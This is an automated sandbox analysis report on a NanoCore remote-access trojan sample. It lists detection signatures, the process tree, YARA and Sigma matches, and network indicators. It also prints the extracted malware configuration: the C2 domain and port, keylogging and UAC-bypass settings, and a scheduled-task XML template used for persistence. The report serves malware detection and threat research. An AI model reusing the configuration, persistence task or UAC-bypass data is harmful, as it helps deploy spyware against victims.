
Analysis Report bGf2H3tXGg.exe

Overview

General Information

Sample Name: bGf2H3tXGg.exe
Analysis ID: 384149
MD5: f72a7fd231e50f9b43c3dab470364846
SHA1: 1ac9f0876ec8f4b95fb0bbae48c2a5b5d02ed411
SHA256: fb01157b437b00f34999faa320bb55c8e44bdbb415e9a15503035bfe0e1d40d6
Tags: exe, NanoCore, RAT

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected Nanocore Rat
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Sigma detected: Scheduled temp file as task from temp location
Yara detected Nanocore RAT
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • bGf2H3tXGg.exe (PID: 4656 cmdline: 'C:\Users\user\Desktop\bGf2H3tXGg.exe' MD5: F72A7FD231E50F9B43C3DAB470364846)
    • bGf2H3tXGg.exe (PID: 204 cmdline: 'C:\Users\user\Desktop\bGf2H3tXGg.exe' MD5: F72A7FD231E50F9B43C3DAB470364846)
      • schtasks.exe (PID: 6280 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6320 cmdline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpE0E8.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • bGf2H3tXGg.exe (PID: 6468 cmdline: C:\Users\user\Desktop\bGf2H3tXGg.exe 0 MD5: F72A7FD231E50F9B43C3DAB470364846)
    • bGf2H3tXGg.exe (PID: 6704 cmdline: C:\Users\user\Desktop\bGf2H3tXGg.exe 0 MD5: F72A7FD231E50F9B43C3DAB470364846)
  • dhcpmon.exe (PID: 6600 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: F72A7FD231E50F9B43C3DAB470364846)
    • dhcpmon.exe (PID: 6816 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0 MD5: F72A7FD231E50F9B43C3DAB470364846)
  • dhcpmon.exe (PID: 6752 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: F72A7FD231E50F9B43C3DAB470364846)
    • dhcpmon.exe (PID: 6212 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: F72A7FD231E50F9B43C3DAB470364846)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "ccf3c62d-d356-4a80-bb94-307bc35a", "Group": "Backup", "Domain1": "backu4734.duckdns.org", "Domain2": "backu4734.duckdns.org", "Port": 8092, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings

00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xff8d:$x1: NanoCore.ClientPluginHost
  • 0xffca:$x2: IClientNetworkHost
  • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfcf5:$a: NanoCore
  • 0xfd05:$a: NanoCore
  • 0xff39:$a: NanoCore
  • 0xff4d:$a: NanoCore
  • 0xff8d:$a: NanoCore
  • 0xfd54:$b: ClientPlugin
  • 0xff56:$b: ClientPlugin
  • 0xff96:$b: ClientPlugin
  • 0xfe7b:$c: ProjectData
  • 0x10882:$d: DESCrypto
  • 0x1824e:$e: KeepAlive
  • 0x1623c:$g: LogClientMessage
  • 0x12437:$i: get_Connected
  • 0x10bb8:$j: #=q
  • 0x10be8:$j: #=q
  • 0x10c04:$j: #=q
  • 0x10c34:$j: #=q
  • 0x10c50:$j: #=q
  • 0x10c6c:$j: #=q
  • 0x10c9c:$j: #=q
  • 0x10cb8:$j: #=q
0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0x146bd:$x1: NanoCore.ClientPluginHost
  • 0x146fa:$x2: IClientNetworkHost
  • 0x1822d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
125 entries in total; only the first are listed here.

Unpacked PEs

Source | Rule | Description | Author | Strings

22.2.dhcpmon.exe.24bcc88.5.raw.unpack | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xe75:$x1: NanoCore.ClientPluginHost
  • 0xe8f:$x2: IClientNetworkHost
22.2.dhcpmon.exe.24bcc88.5.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xe75:$x2: NanoCore.ClientPluginHost
  • 0x1261:$s3: PipeExists
  • 0x1136:$s4: PipeCreated
  • 0xeb0:$s5: IClientLoggingHost
11.2.bGf2H3tXGg.exe.29c1458.3.unpack | Nanocore_RAT_Gen_2 | Detects the Nanocore RAT | Florian Roth
  • 0xe38d:$x1: NanoCore.ClientPluginHost
  • 0xe3ca:$x2: IClientNetworkHost
  • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
11.2.bGf2H3tXGg.exe.29c1458.3.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth
  • 0xe105:$x1: NanoCore Client.exe
  • 0xe38d:$x2: NanoCore.ClientPluginHost
  • 0xf9c6:$s1: PluginCommand
  • 0xf9ba:$s2: FileCommand
  • 0x1086b:$s3: PipeExists
  • 0x16622:$s4: PipeCreated
  • 0xe3b7:$s5: IClientLoggingHost
11.2.bGf2H3tXGg.exe.29c1458.3.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
355 entries in total; only the first are listed here.

Sigma Overview

System Summary:

Sigma detected: NanoCore
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\bGf2H3tXGg.exe, ProcessId: 204, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
Sigma detected: Scheduled temp file as task from temp location
Source: Process started | Author: Joe Security | Data: Command: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp', CommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp', CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\bGf2H3tXGg.exe', ParentImage: C:\Users\user\Desktop\bGf2H3tXGg.exe, ParentProcessId: 204, ProcessCommandLine: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpDE28.tmp', ProcessId: 6280

Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll | Avira: detection malicious, Label: HEUR/AGEN.1120893
Source: C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll | Avira: detection malicious, Label: HEUR/AGEN.1120893
Source: C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll | Avira: detection malicious, Label: HEUR/AGEN.1120893
Source: C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll | Avira: detection malicious, Label: HEUR/AGEN.1120893
Found malware configuration
Source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp | Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "ccf3c62d-d356-4a80-bb94-307bc35a", "Group": "Backup", "Domain1": "backu4734.duckdns.org", "Domain2": "backu4734.duckdns.org", "Port": 8092, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Virustotal: Detection: 50%
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll | Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll | Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\nsfEFEC.tmp\xktfu.dll | ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll | Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll | Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\nsh9AB8.tmp\xktfu.dll | ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll | Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll | Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\nsmE619.tmp\xktfu.dll | ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll | Virustotal: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll | Metadefender: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\nsp1382.tmp\xktfu.dll | ReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: bGf2H3tXGg.exe | Virustotal: Detection: 50%
Source: bGf2H3tXGg.exe | ReversingLabs: Detection: 68%
Yara detected Nanocore RAT
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: bGf2H3tXGg.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 22.2.dhcpmon.exe.2430000.4.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 22.1.dhcpmon.exe.400000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 22.2.dhcpmon.exe.400000.1.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.2.bGf2H3tXGg.exe.400000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.2.bGf2H3tXGg.exe.400000.1.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.2.dhcpmon.exe.4a60000.10.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.1.bGf2H3tXGg.exe.400000.0.unpack | Avira: Label: TR/Dropper.MSIL.Gen7
Source: 17.2.dhcpmon.exe.400000.1.unpack | Avira: Label: TR/Dropper.MSIL.Gen7

        Compliance:

        barindex
        Detected unpacking (creates a PE file in dynamic memory)Show sources
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 22.2.dhcpmon.exe.2430000.4.unpack
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeUnpacked PE file: 3.2.bGf2H3tXGg.exe.400000.1.unpack
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exeUnpacked PE file: 14.2.bGf2H3tXGg.exe.400000.0.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 17.2.dhcpmon.exe.400000.1.unpack
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeUnpacked PE file: 22.2.dhcpmon.exe.400000.1.unpack
        Source: bGf2H3tXGg.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: bGf2H3tXGg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wntdll.pdbUGP source: bGf2H3tXGg.exe, 00000000.00000003.242145777.0000000002A00000.00000004.00000001.sdmp, bGf2H3tXGg.exe, 0000000B.00000003.300129419.0000000002A50000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.294879939.0000000002900000.00000004.00000001.sdmp, dhcpmon.exe, 0000000F.00000003.316493535.0000000002A50000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb source: bGf2H3tXGg.exe, 00000000.00000003.242145777.0000000002A00000.00000004.00000001.sdmp, bGf2H3tXGg.exe, 0000000B.00000003.300129419.0000000002A50000.00000004.00000001.sdmp, dhcpmon.exe, 0000000C.00000003.294879939.0000000002900000.00000004.00000001.sdmp, dhcpmon.exe, 0000000F.00000003.316493535.0000000002A50000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp
        Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: bGf2H3tXGg.exe, 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 3_2_00404A29 FindFirstFileExW,3_2_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 3_1_00404A29 FindFirstFileExW,3_1_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 14_2_00404A29 FindFirstFileExW,14_2_00404A29
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 14_1_00404A29 FindFirstFileExW,14_1_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 17_2_00404A29 FindFirstFileExW,17_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 22_2_00404A29 FindFirstFileExW,22_2_00404A29
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 22_1_00404A29 FindFirstFileExW,22_1_00404A29

        Networking:

        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractor | URLs: backu4734.duckdns.org
        Uses dynamic DNS services
        Source: unknown | DNS query: name: backu4734.duckdns.org
        Source: global traffic | TCP traffic: 192.168.2.5:49708 -> 40.71.91.165:8092
        Source: Joe Sandbox View | ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
        Source: unknown | DNS traffic detected: queries for: backu4734.duckdns.org
        Source: bGf2H3tXGg.exe, 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp | String found in binary or memory: http://google.com
        Source: bGf2H3tXGg.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: bGf2H3tXGg.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: C:\Users\user\Desktop\bGf2H3tXGg.exe | Code function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C
        Source: bGf2H3tXGg.exe, 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp | Binary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        Yara detected Nanocore RAT
        Source: Yara match | File source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.318707635.00000000024E1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.323797763.0000000002561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.488999685.00000000023D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.339201684.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 00000003.00000002.493192985.0000000003464000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORY
        Source: Yara match | File source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORY
        Source: Yara match | File source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORY
        Source: Yara match | File source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORY
        Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORY
        Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORY
        Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORY
        Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORY
        Source: Yara match | File source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE
